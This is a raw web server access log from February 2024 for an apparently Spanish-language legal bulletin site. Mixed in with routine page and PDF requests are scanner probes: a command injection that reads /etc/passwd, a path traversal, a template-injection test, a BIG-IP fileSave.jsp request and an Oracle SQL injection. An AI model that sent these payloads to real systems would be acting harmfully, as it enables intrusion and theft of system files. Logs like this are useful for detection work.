216.244.66.195 - - [28/Feb/2024:03:24:25 -0500] "GET /BLA/resoluciones/AUTOS%202023/1921.pdf HTTP/1.1" 200 406165
52.167.144.189 - - [28/Feb/2024:03:24:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3635.pdf HTTP/1.1" 200 343557
201.245.192.253 - - [28/Feb/2024:03:25:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:26:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:26:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
172.22.2.4 - - [28/Feb/2024:03:26:25 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%20011%20del%2005%20de%20julio%20de%202017.pdf HTTP/1.1" 200 965526
172.22.2.4 - - [28/Feb/2024:03:26:25 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1492
172.22.2.4 - - [28/Feb/2024:03:25:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/Feb/2024:03:26:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Feb/2024:03:25:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49794
52.167.144.137 - - [28/Feb/2024:03:27:26 -0500] "GET /BLA/resoluciones/AUTOS%202023/3688.pdf HTTP/1.1" 200 465630
172.22.2.4 - - [28/Feb/2024:03:26:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54300
201.245.192.253 - - [28/Feb/2024:03:27:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:28:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
140.120.136.14 - - [28/Feb/2024:03:28:20 -0500] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 404 1034
140.120.136.14 - - [28/Feb/2024:03:28:21 -0500] "\x16\x03\x01" 400 226
172.22.2.4 - - [28/Feb/2024:03:27:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:03:29:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39617
201.245.192.253 - - [28/Feb/2024:03:29:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33387
201.245.192.253 - - [28/Feb/2024:03:29:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:29:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39455
172.22.2.4 - - [28/Feb/2024:03:30:05 -0500] "GET /BLA/boletinlegal/cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1" 404 1038
201.245.192.253 - - [28/Feb/2024:03:30:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
140.120.136.14 - - [28/Feb/2024:03:30:29 -0500] "GET /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} HTTP/1.1" 404 1022
201.245.192.253 - - [28/Feb/2024:03:30:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33387
201.245.192.253 - - [28/Feb/2024:03:31:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
201.245.192.253 - - [28/Feb/2024:03:31:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [28/Feb/2024:03:31:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:03:32:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
140.120.136.14 - - [28/Feb/2024:03:32:42 -0500] "GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1" 404 1035
172.22.2.4 - - [28/Feb/2024:03:31:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
140.120.136.14 - - [28/Feb/2024:03:33:05 -0500] "\x16\x03\x01" 400 226
216.244.66.195 - - [28/Feb/2024:03:33:08 -0500] "GET /robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [28/Feb/2024:03:31:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
172.22.2.4 - - [28/Feb/2024:03:33:14 -0500] "GET /BLA/boletinlegal/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1" 200 24523
201.245.192.253 - - [28/Feb/2024:03:33:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:34:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:35:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:36:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:36:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
216.245.221.92 - - [28/Feb/2024:03:36:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:03:37:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:38:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:03:38:18 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [28/Feb/2024:03:36:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Feb/2024:03:37:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54913
201.245.192.253 - - [28/Feb/2024:03:39:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39617
201.245.192.253 - - [28/Feb/2024:03:39:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33387
201.245.192.253 - - [28/Feb/2024:03:39:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:03:38:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56779
